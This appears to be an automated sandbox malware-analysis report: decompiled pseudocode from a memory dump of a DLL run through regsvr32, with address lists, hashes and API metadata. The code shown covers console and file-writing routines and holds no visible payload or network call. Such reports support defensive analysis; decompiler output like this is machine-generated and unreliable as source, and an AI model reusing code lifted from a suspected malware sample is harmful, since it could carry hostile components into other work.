                                                                                                        				void* _t345;
                                                                                                        				intOrPtr* _t347;
                                                                                                        				intOrPtr _t351;
                                                                                                        				signed long long _t356;
                                                                                                        				signed long long _t359;
                                                                                                        				signed long long _t361;
                                                                                                        				void* _t364;
                                                                                                        				long long _t365;
                                                                                                        				long long _t367;
                                                                                                        				char _t368;
                                                                                                        				void* _t372;
                                                                                                        				signed char* _t373;
                                                                                                        				signed long long _t375;
                                                                                                        
                                                                                                        				_t263 = _t337;
                                                                                                        				_t336 = _t263 - 0x57;
                                                                                                        				_t338 = _t337 - 0xe0;
                                                                                                        				 *((long long*)(_t336 - 9)) = 0xfffffffe;
                                                                                                        				 *((long long*)(_t263 + 8)) = __rbx;
                                                                                                        				_t264 =  *0x2897e008; // 0xf9c171536c9e
                                                                                                        				 *(_t336 + 0x17) = _t264 ^ _t338;
                                                                                                        				 *((long long*)(_t336 - 0x49)) = __r8;
                                                                                                        				_t289 = __rcx;
                                                                                                        				_t367 =  *((intOrPtr*)(_t336 + 0x7f));
                                                                                                        				 *((long long*)(_t336 - 0x51)) = _t367;
                                                                                                        				 *(_t336 - 0x19) = __edx;
                                                                                                        				_t267 = __edx >> 6;
                                                                                                        				 *(_t336 - 0x59) = _t267;
                                                                                                        				 *(_t336 - 0x11) = __edx;
                                                                                                        				_t375 = __edx + __edx * 8;
                                                                                                        				_t269 =  *((intOrPtr*)( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t267 * 8)) + 0x28 + _t375 * 8));
                                                                                                        				 *((long long*)(_t336 - 0x29)) = _t269;
                                                                                                        				r12d = r9d;
                                                                                                        				_t365 = _t364 + __r8;
                                                                                                        				 *((long long*)(_t336 - 0x71)) = _t365;
                                                                                                        				 *((intOrPtr*)(_t336 - 0x61)) = GetConsoleOutputCP();
                                                                                                        				if ( *((intOrPtr*)(_t367 + 0x28)) != dil) goto 0x289109f8;
                                                                                                        				0x28909140();
                                                                                                        				_t294 =  *((intOrPtr*)(_t367 + 0x18));
                                                                                                        				r8d =  *(_t294 + 0xc);
                                                                                                        				 *(_t336 - 0x5d) = r8d;
                                                                                                        				 *((long long*)(__rcx)) = _t269;
                                                                                                        				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x49)) - _t365 >= 0) goto 0x28910db8;
                                                                                                        				_t271 = __edx >> 6;
                                                                                                        				 *(_t336 - 0x21) = _t271;
                                                                                                        				 *((char*)(_t338 + 0x40)) =  *((intOrPtr*)(__r8));
                                                                                                        				 *((intOrPtr*)(_t336 - 0x7d)) = 0;
                                                                                                        				r12d = 1;
                                                                                                        				if (r8d != 0xfde9) goto 0x28910bc0;
                                                                                                        				_t347 = 0x3e + _t375 * 8 +  *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t271 * 8));
                                                                                                        				if ( *_t347 == dil) goto 0x28910a74;
                                                                                                        				_t372 = _t329 + 1;
                                                                                                        				if (_t372 - 5 < 0) goto 0x28910a61;
                                                                                                        				if (_t372 == 0) goto 0x28910b52;
                                                                                                        				r12d =  *((char*)(_t294 + 0x7ffc2897e8f0));
                                                                                                        				r12d = r12d + 1;
                                                                                                        				_t181 = r12d - 1;
                                                                                                        				 *((intOrPtr*)(_t336 - 0x69)) = _t181;
                                                                                                        				_t341 = _t181;
                                                                                                        				if (_t341 -  *((intOrPtr*)(_t336 - 0x71)) - __r8 > 0) goto 0x28910d27;
                                                                                                        				_t295 = _t329;
                                                                                                        				 *((char*)(_t336 + _t295 - 1)) =  *_t347;
                                                                                                        				if (_t295 + 1 - _t372 < 0) goto 0x28910ab9;
                                                                                                        				if (_t341 <= 0) goto 0x28910aea;
                                                                                                        				E00007FFC7FFC289064D0( *( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + 0x3e + _t375 * 8) & 0x000000ff, 0, __esi, __esp, _t336 - 1 + _t372, __r8, _t329, __r8, _t341);
                                                                                                        				_t318 = _t329;
                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 +  *(_t336 - 0x59) * 8)) + _t318 + 0x3e + _t375 * 8)) = dil;
                                                                                                        				if (_t318 + 1 - _t372 < 0) goto 0x28910aed;
                                                                                                        				 *((long long*)(_t336 - 0x41)) = _t329;
                                                                                                        				_t276 = _t336 - 1;
                                                                                                        				 *((long long*)(_t336 - 0x39)) = _t276;
                                                                                                        				_t186 = (0 | r12d == 0x00000004) + 1;
                                                                                                        				r12d = _t186;
                                                                                                        				r8d = _t186;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t367;
                                                                                                        				E00007FFC7FFC28911744(_t276, _t289, _t336 - 0x7d, _t336 - 0x39, _t341, _t336 - 0x41);
                                                                                                        				if (_t276 == 0xffffffff) goto 0x28910db8;
                                                                                                        				_t331 = __r8 +  *((intOrPtr*)(_t336 - 0x69)) - 1;
                                                                                                        				goto 0x28910c55;
                                                                                                        				_t368 =  *((char*)(_t276 + 0x7ffc2897e8f0));
                                                                                                        				_t212 = _t368 + 1;
                                                                                                        				_t343 =  *((intOrPtr*)(_t336 - 0x71)) - _t331;
                                                                                                        				if (_t212 - _t343 > 0) goto 0x28910d55;
                                                                                                        				 *((long long*)(_t336 - 0x69)) = _t329;
                                                                                                        				 *((long long*)(_t336 - 0x31)) = _t331;
                                                                                                        				_t193 = (0 | _t212 == 0x00000004) + 1;
                                                                                                        				r14d = _t193;
                                                                                                        				r8d = _t193;
                                                                                                        				_t278 =  *((intOrPtr*)(_t336 - 0x51));
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t278;
                                                                                                        				E00007FFC7FFC28911744(_t278, _t289, _t336 - 0x7d, _t336 - 0x31, _t343, _t336 - 0x69);
                                                                                                        				if (_t278 == 0xffffffff) goto 0x28910db8;
                                                                                                        				_t332 = _t331 + _t368;
                                                                                                        				r12d = r14d;
                                                                                                        				goto 0x28910c55;
                                                                                                        				_t359 =  *(_t336 - 0x59);
                                                                                                        				_t351 =  *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t359 * 8));
                                                                                                        				_t213 =  *(_t351 + 0x3d + _t375 * 8);
                                                                                                        				if ((_t213 & 0x00000004) == 0) goto 0x28910bf7;
                                                                                                        				 *((char*)(_t336 + 7)) =  *((intOrPtr*)(_t351 + 0x3e + _t375 * 8));
                                                                                                        				 *((char*)(_t336 + 8)) =  *_t332;
                                                                                                        				 *(_t351 + 0x3d + _t375 * 8) = _t213 & 0x000000fb;
                                                                                                        				r8d = 2;
                                                                                                        				goto 0x28910c40;
                                                                                                        				r8d =  *_t332 & 0x000000ff;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 - 0x51)) + 0x18)))) + _t343 * 2)) >= 0) goto 0x28910c3a;
                                                                                                        				_t373 =  &(_t332[1]);
                                                                                                        				if (_t373 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x28910d93;
                                                                                                        				r8d = 2;
                                                                                                        				if (E00007FFC7FFC2890E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t332, _t329, _t332, _t336, _t343,  *((intOrPtr*)(_t336 - 0x51))) == 0xffffffff) goto 0x28910db8;
                                                                                                        				_t333 = _t373;
                                                                                                        				goto 0x28910c55;
                                                                                                        				_t198 = E00007FFC7FFC2890E960(_t213 & 0x000000fb, __ebp, _t289, _t336 - 0x7d, _t333, _t329, _t333, _t336, _t365,  *((intOrPtr*)(_t336 - 0x51)));
                                                                                                        				if (_t198 == 0xffffffff) goto 0x28910db8;
                                                                                                        				_t334 =  &(_t333[1]);
                                                                                                        				 *((long long*)(_t338 + 0x38)) = _t329;
                                                                                                        				 *((long long*)(_t338 + 0x30)) = _t329;
                                                                                                        				 *((intOrPtr*)(_t338 + 0x28)) = 5;
                                                                                                        				_t280 = _t336 + 0xf;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t280;
                                                                                                        				r9d = r12d;
                                                                                                        				_t345 = _t336 - 0x7d;
                                                                                                        				E00007FFC7FFC2890D698();
                                                                                                        				r14d = _t198;
                                                                                                        				if (_t198 == 0) goto 0x28910db8;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                        				r8d = _t198;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x28910db0;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) = __esi -  *((intOrPtr*)(_t336 - 0x49)) +  *((intOrPtr*)(_t289 + 8));
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x79)) - r14d < 0) goto 0x28910db8;
                                                                                                        				if ( *((char*)(_t338 + 0x40)) != 0xa) goto 0x28910d10;
                                                                                                        				 *((short*)(_t338 + 0x40)) = 0xd;
                                                                                                        				 *((long long*)(_t338 + 0x20)) = _t329;
                                                                                                        				_t128 = _t280 - 0xc; // 0x1
                                                                                                        				r8d = _t128;
                                                                                                        				_t326 = _t338 + 0x40;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x28910db0;
                                                                                                        				if ( *((intOrPtr*)(_t336 - 0x79)) - 1 < 0) goto 0x28910db8;
                                                                                                        				 *((intOrPtr*)(_t289 + 8)) =  *((intOrPtr*)(_t289 + 8)) + 1;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + 1;
                                                                                                        				if (_t334 -  *((intOrPtr*)(_t336 - 0x71)) >= 0) goto 0x28910db8;
                                                                                                        				r8d =  *(_t336 - 0x5d);
                                                                                                        				goto 0x28910a23;
                                                                                                        				if (_t326 <= 0) goto 0x28910d50;
                                                                                                        				_t335 = _t334 - _t373;
                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t359 * 8)) + _t373 + 0x3e + _t375 * 8)) =  *((intOrPtr*)(_t335 + _t373));
                                                                                                        				if (1 - _t326 < 0) goto 0x28910d2f;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
                                                                                                        				goto 0x28910db8;
                                                                                                        				if (_t345 <= 0) goto 0x28910d8d;
                                                                                                        				_t327 = _t329;
                                                                                                        				_t361 =  *(_t336 - 0x19) >> 6;
                                                                                                        				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
                                                                                                        				_t328 = _t327 + 1;
                                                                                                        				if (2 - _t345 < 0) goto 0x28910d6d;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
                                                                                                        				goto 0x28910db8;
                                                                                                        				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
                                                                                                        				 *( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffc28900000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
                                                                                                        				_t174 = _t328 + 1; // 0x1
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) = _t174;
                                                                                                        				goto 0x28910db8;
                                                                                                        				 *_t289 = GetLastError();
                                                                                                        				return E00007FFC7FFC28903A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
                                                                                                        			}



















































                                                                                                        0x7ffc28910958
                                                                                                        0x7ffc28910966
                                                                                                        0x7ffc2891096a
                                                                                                        0x7ffc28910971
                                                                                                        0x7ffc28910979
                                                                                                        0x7ffc2891097d
                                                                                                        0x7ffc28910987
                                                                                                        0x7ffc2891098e
                                                                                                        0x7ffc28910995
                                                                                                        0x7ffc28910998
                                                                                                        0x7ffc2891099c
                                                                                                        0x7ffc289109a3
                                                                                                        0x7ffc289109aa
                                                                                                        0x7ffc289109ae
                                                                                                        0x7ffc289109bc
                                                                                                        0x7ffc289109c0
                                                                                                        0x7ffc289109cc
                                                                                                        0x7ffc289109d1
                                                                                                        0x7ffc289109d5
                                                                                                        0x7ffc289109d8
                                                                                                        0x7ffc289109db
                                                                                                        0x7ffc289109e5
                                                                                                        0x7ffc289109ee
                                                                                                        0x7ffc289109f3
                                                                                                        0x7ffc289109f8
                                                                                                        0x7ffc289109fc
                                                                                                        0x7ffc28910a00
                                                                                                        0x7ffc28910a06
                                                                                                        0x7ffc28910a09
                                                                                                        0x7ffc28910a10
                                                                                                        0x7ffc28910a19
                                                                                                        0x7ffc28910a1d
                                                                                                        0x7ffc28910a25
                                                                                                        0x7ffc28910a29
                                                                                                        0x7ffc28910a2c
                                                                                                        0x7ffc28910a40
                                                                                                        0x7ffc28910a5b
                                                                                                        0x7ffc28910a64
                                                                                                        0x7ffc28910a68
                                                                                                        0x7ffc28910a72
                                                                                                        0x7ffc28910a77
                                                                                                        0x7ffc28910a8f
                                                                                                        0x7ffc28910a98
                                                                                                        0x7ffc28910a9e
                                                                                                        0x7ffc28910aa0
                                                                                                        0x7ffc28910aaa
                                                                                                        0x7ffc28910ab0
                                                                                                        0x7ffc28910ab6
                                                                                                        0x7ffc28910abc
                                                                                                        0x7ffc28910ac9
                                                                                                        0x7ffc28910ace
                                                                                                        0x7ffc28910ada
                                                                                                        0x7ffc28910aea
                                                                                                        0x7ffc28910af8
                                                                                                        0x7ffc28910b03
                                                                                                        0x7ffc28910b05
                                                                                                        0x7ffc28910b09
                                                                                                        0x7ffc28910b0d
                                                                                                        0x7ffc28910b1a
                                                                                                        0x7ffc28910b1c
                                                                                                        0x7ffc28910b1f
                                                                                                        0x7ffc28910b22
                                                                                                        0x7ffc28910b33
                                                                                                        0x7ffc28910b3c
                                                                                                        0x7ffc28910b4a
                                                                                                        0x7ffc28910b4d
                                                                                                        0x7ffc28910b55
                                                                                                        0x7ffc28910b5e
                                                                                                        0x7ffc28910b66
                                                                                                        0x7ffc28910b6f
                                                                                                        0x7ffc28910b75
                                                                                                        0x7ffc28910b79
                                                                                                        0x7ffc28910b85
                                                                                                        0x7ffc28910b87
                                                                                                        0x7ffc28910b8a
                                                                                                        0x7ffc28910b8d
                                                                                                        0x7ffc28910b91
                                                                                                        0x7ffc28910ba2
                                                                                                        0x7ffc28910bab
                                                                                                        0x7ffc28910bb1
                                                                                                        0x7ffc28910bb4
                                                                                                        0x7ffc28910bbb
                                                                                                        0x7ffc28910bc0
                                                                                                        0x7ffc28910bc4
                                                                                                        0x7ffc28910bcc
                                                                                                        0x7ffc28910bd4
                                                                                                        0x7ffc28910bdb
                                                                                                        0x7ffc28910be0
                                                                                                        0x7ffc28910be6
                                                                                                        0x7ffc28910beb
                                                                                                        0x7ffc28910bf5
                                                                                                        0x7ffc28910bf7
                                                                                                        0x7ffc28910c07
                                                                                                        0x7ffc28910c09
                                                                                                        0x7ffc28910c11
                                                                                                        0x7ffc28910c1a
                                                                                                        0x7ffc28910c2f
                                                                                                        0x7ffc28910c35
                                                                                                        0x7ffc28910c38
                                                                                                        0x7ffc28910c47
                                                                                                        0x7ffc28910c4f
                                                                                                        0x7ffc28910c55
                                                                                                        0x7ffc28910c58
                                                                                                        0x7ffc28910c5d
                                                                                                        0x7ffc28910c62
                                                                                                        0x7ffc28910c6a
                                                                                                        0x7ffc28910c6e
                                                                                                        0x7ffc28910c73
                                                                                                        0x7ffc28910c76
                                                                                                        0x7ffc28910c7f
                                                                                                        0x7ffc28910c84
                                                                                                        0x7ffc28910c89
                                                                                                        0x7ffc28910c8f
                                                                                                        0x7ffc28910c98
                                                                                                        0x7ffc28910cae
                                                                                                        0x7ffc28910cbc
                                                                                                        0x7ffc28910cc3
                                                                                                        0x7ffc28910cce
                                                                                                        0x7ffc28910cd5
                                                                                                        0x7ffc28910cda
                                                                                                        0x7ffc28910ce3
                                                                                                        0x7ffc28910ce3
                                                                                                        0x7ffc28910ce7
                                                                                                        0x7ffc28910cf7
                                                                                                        0x7ffc28910d01
                                                                                                        0x7ffc28910d07
                                                                                                        0x7ffc28910d0a
                                                                                                        0x7ffc28910d14
                                                                                                        0x7ffc28910d1e
                                                                                                        0x7ffc28910d22
                                                                                                        0x7ffc28910d2a
                                                                                                        0x7ffc28910d2c
                                                                                                        0x7ffc28910d3e
                                                                                                        0x7ffc28910d4e
                                                                                                        0x7ffc28910d50
                                                                                                        0x7ffc28910d53
                                                                                                        0x7ffc28910d58
                                                                                                        0x7ffc28910d5a
                                                                                                        0x7ffc28910d61
                                                                                                        0x7ffc28910d69
                                                                                                        0x7ffc28910d7c
                                                                                                        0x7ffc28910d82
                                                                                                        0x7ffc28910d8b
                                                                                                        0x7ffc28910d8d
                                                                                                        0x7ffc28910d91
                                                                                                        0x7ffc28910d95
                                                                                                        0x7ffc28910da2
                                                                                                        0x7ffc28910da8
                                                                                                        0x7ffc28910dab
                                                                                                        0x7ffc28910dae
                                                                                                        0x7ffc28910db6
                                                                                                        0x7ffc28910de1

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.262208770.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.262199056.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262381671.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262533888.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262549864.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262599923.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.262606085.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc28900000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                        • String ID:
                                                                                                        • API String ID: 2718003287-0
                                                                                                        • Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                        • Instruction ID: 4be2d833791e307044649b74fde4b2b29646d26cfa5a912fa78b01bf0da0106d
                                                                                                        • Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                        • Instruction Fuzzy Hash: 3DD1FF22B08B9989EB11DF79DC402AC37B1FB05B99B144232CE5DA7BD9CE39E406C714
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 29%
                                                                                                        			E00007FFC7FFC2891129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                        				signed short _v80;
                                                                                                        				void* _v92;
                                                                                                        				signed int _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				long _v112;
                                                                                                        				signed int _v120;
                                                                                                        				long long _v128;
                                                                                                        				signed int _v136;
                                                                                                        				void* __rbx;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				void* _t107;
                                                                                                        				long _t116;
                                                                                                        				signed int _t117;
                                                                                                        				void* _t122;
                                                                                                        				signed int _t128;
                                                                                                        				intOrPtr _t146;
                                                                                                        				intOrPtr _t147;
                                                                                                        				void* _t169;
                                                                                                        				signed long long _t182;
                                                                                                        				signed long long _t186;
                                                                                                        				signed long long _t189;
                                                                                                        				signed long long _t208;
                                                                                                        				signed int _t209;
                                                                                                        				void* _t210;
                                                                                                        				void* _t212;
                                                                                                        				void* _t228;
                                                                                                        				signed long long _t229;
                                                                                                        				signed short* _t230;
                                                                                                        				void* _t231;
                                                                                                        				signed short* _t232;
                                                                                                        
                                                                                                        				_t122 = __ebx;
                                                                                                        				r15d = r8d;
                                                                                                        				_t186 = __r9;
                                                                                                        				_t230 = __rdx;
                                                                                                        				if (r8d == 0) goto 0x28911599;
                                                                                                        				if (__rdx != 0) goto 0x28911303;
                                                                                                        				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                        				r8d = 0;
                                                                                                        				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                        				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                        				r9d = 0;
                                                                                                        				_v128 = __r9;
                                                                                                        				_v136 = _t209;
                                                                                                        				E00007FFC7FFC28909674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
                                                                                                        				goto 0x2891159b;
                                                                                                        				_t189 = __ecx >> 6;
                                                                                                        				_v120 = _t189;
                                                                                                        				_t229 = __ecx + __ecx * 8;
                                                                                                        				if (_t210 - 1 - 1 > 0) goto 0x28911339;
                                                                                                        				if (( !r15d & 0x00000001) == 0) goto 0x289112cc;
                                                                                                        				if (( *( *((intOrPtr*)(0x2897f940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x2891134f;
                                                                                                        				r8d = 0x7ffc2897f942;
                                                                                                        				E00007FFC7FFC28911E38(r12d);
                                                                                                        				_v96 = _t209;
                                                                                                        				if (E00007FFC7FFC289116A0(r12d, __ecx) == 0) goto 0x28911485;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0x2897f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x28911485;
                                                                                                        				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x28911396;
                                                                                                        				0x28909140();
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x289113b2;
                                                                                                        				_t182 =  *((intOrPtr*)(0x2897f940 + _v120 * 8));
                                                                                                        				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x28911485;
                                                                                                        				if (GetConsoleMode(??, ??) == 0) goto 0x2891147a;
                                                                                                        				if (sil == 0) goto 0x28911457;
                                                                                                        				sil = sil - 1;
                                                                                                        				if (sil - 1 > 0) goto 0x2891151e;
                                                                                                        				_t228 = _t230 + _t231;
                                                                                                        				_v112 = _t209;
                                                                                                        				_t232 = _t230;
                                                                                                        				if (_t230 - _t228 >= 0) goto 0x28911514;
                                                                                                        				_v80 =  *_t232 & 0x0000ffff;
                                                                                                        				_t107 = E00007FFC7FFC28911E40( *_t232 & 0xffff);
                                                                                                        				_t128 = _v80 & 0x0000ffff;
                                                                                                        				if (_t107 != _t128) goto 0x28911449;
                                                                                                        				_t146 = _v108 + 2;
                                                                                                        				_v108 = _t146;
                                                                                                        				if (_t128 != 0xa) goto 0x2891143a;
                                                                                                        				if (E00007FFC7FFC28911E40(0xd) != 0xd) goto 0x28911449;
                                                                                                        				_t147 = _t146 + 1;
                                                                                                        				_v108 = _t147;
                                                                                                        				if ( &(_t232[1]) - _t228 >= 0) goto 0x28911514;
                                                                                                        				goto 0x289113fa;
                                                                                                        				_v112 = GetLastError();
                                                                                                        				goto 0x28911514;
                                                                                                        				r9d = r15d;
                                                                                                        				_v136 = __r9;
                                                                                                        				E00007FFC7FFC28910958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
                                                                                                        				asm("movsd xmm0, [eax]");
                                                                                                        				goto 0x28911519;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0x2897f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x289114e1;
                                                                                                        				_t169 = sil;
                                                                                                        				if (_t169 == 0) goto 0x289114cd;
                                                                                                        				if (_t169 == 0) goto 0x289114b9;
                                                                                                        				if (_t147 - 1 != 1) goto 0x28911529;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC28910EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x2891146e;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC28911004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x2891146e;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC28910DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x2891146e;
                                                                                                        				r8d = r15d;
                                                                                                        				_v136 = _v136 & _t182;
                                                                                                        				_v112 = _t182;
                                                                                                        				_v104 = 0;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x28911511;
                                                                                                        				_t116 = GetLastError();
                                                                                                        				_v112 = _t116;
                                                                                                        				asm("movsd xmm0, [ebp-0x30]");
                                                                                                        				asm("movsd [ebp-0x20], xmm0");
                                                                                                        				if (_t116 != 0) goto 0x28911592;
                                                                                                        				_t117 = _v96;
                                                                                                        				if (_t117 == 0) goto 0x28911568;
                                                                                                        				if (_t117 != 5) goto 0x28911558;
                                                                                                        				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
                                                                                                        				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                        				 *(_t186 + 0x34) = _t117;
                                                                                                        				goto 0x289112fb;
                                                                                                        				_t208 = _t186;
                                                                                                        				E00007FFC7FFC2890B3DC(_v96, _t208);
                                                                                                        				goto 0x289112fb;
                                                                                                        				if (( *( *((intOrPtr*)(0x2897f940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x2891157a;
                                                                                                        				if ( *_t230 == 0x1a) goto 0x28911599;
                                                                                                        				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
                                                                                                        				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
                                                                                                        				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                        				goto 0x289112fb;
                                                                                                        				goto 0x2891159b;
                                                                                                        				return 0;
                                                                                                        			}



































                                                                                                        0x7ffc2891129c
                                                                                                        0x7ffc289112b2
                                                                                                        0x7ffc289112b8
                                                                                                        0x7ffc289112bb
                                                                                                        0x7ffc289112c1
                                                                                                        0x7ffc289112ca
                                                                                                        0x7ffc289112cc
                                                                                                        0x7ffc289112d1
                                                                                                        0x7ffc289112d4
                                                                                                        0x7ffc289112da
                                                                                                        0x7ffc289112e1
                                                                                                        0x7ffc289112e9
                                                                                                        0x7ffc289112ec
                                                                                                        0x7ffc289112f1
                                                                                                        0x7ffc289112f6
                                                                                                        0x7ffc289112fe
                                                                                                        0x7ffc28911313
                                                                                                        0x7ffc28911317
                                                                                                        0x7ffc2891131b
                                                                                                        0x7ffc2891132e
                                                                                                        0x7ffc28911337
                                                                                                        0x7ffc2891133f
                                                                                                        0x7ffc28911346
                                                                                                        0x7ffc2891134a
                                                                                                        0x7ffc28911352
                                                                                                        0x7ffc28911368
                                                                                                        0x7ffc28911377
                                                                                                        0x7ffc28911381
                                                                                                        0x7ffc28911386
                                                                                                        0x7ffc289113a1
                                                                                                        0x7ffc289113a3
                                                                                                        0x7ffc289113ac
                                                                                                        0x7ffc289113c7
                                                                                                        0x7ffc289113d0
                                                                                                        0x7ffc289113d6
                                                                                                        0x7ffc289113dd
                                                                                                        0x7ffc289113e3
                                                                                                        0x7ffc289113e7
                                                                                                        0x7ffc289113eb
                                                                                                        0x7ffc289113f1
                                                                                                        0x7ffc28911401
                                                                                                        0x7ffc28911405
                                                                                                        0x7ffc2891140a
                                                                                                        0x7ffc28911411
                                                                                                        0x7ffc28911413
                                                                                                        0x7ffc28911416
                                                                                                        0x7ffc2891141d
                                                                                                        0x7ffc28911431
                                                                                                        0x7ffc28911433
                                                                                                        0x7ffc28911435
                                                                                                        0x7ffc28911441
                                                                                                        0x7ffc28911447
                                                                                                        0x7ffc2891144f
                                                                                                        0x7ffc28911452
                                                                                                        0x7ffc28911457
                                                                                                        0x7ffc2891145a
                                                                                                        0x7ffc28911469
                                                                                                        0x7ffc2891146e
                                                                                                        0x7ffc28911475
                                                                                                        0x7ffc2891148e
                                                                                                        0x7ffc28911492
                                                                                                        0x7ffc28911495
                                                                                                        0x7ffc2891149a
                                                                                                        0x7ffc2891149f
                                                                                                        0x7ffc289114a5
                                                                                                        0x7ffc289114b2
                                                                                                        0x7ffc289114b7
                                                                                                        0x7ffc289114b9
                                                                                                        0x7ffc289114c6
                                                                                                        0x7ffc289114cb
                                                                                                        0x7ffc289114cd
                                                                                                        0x7ffc289114da
                                                                                                        0x7ffc289114df
                                                                                                        0x7ffc289114ec
                                                                                                        0x7ffc289114ef
                                                                                                        0x7ffc289114f7
                                                                                                        0x7ffc289114fb
                                                                                                        0x7ffc28911506
                                                                                                        0x7ffc28911508
                                                                                                        0x7ffc2891150e
                                                                                                        0x7ffc28911514
                                                                                                        0x7ffc28911519
                                                                                                        0x7ffc28911533
                                                                                                        0x7ffc28911535
                                                                                                        0x7ffc2891153a
                                                                                                        0x7ffc2891153f
                                                                                                        0x7ffc28911541
                                                                                                        0x7ffc28911545
                                                                                                        0x7ffc2891154c
                                                                                                        0x7ffc28911550
                                                                                                        0x7ffc28911553
                                                                                                        0x7ffc2891155b
                                                                                                        0x7ffc2891155e
                                                                                                        0x7ffc28911563
                                                                                                        0x7ffc28911572
                                                                                                        0x7ffc28911578
                                                                                                        0x7ffc2891157a
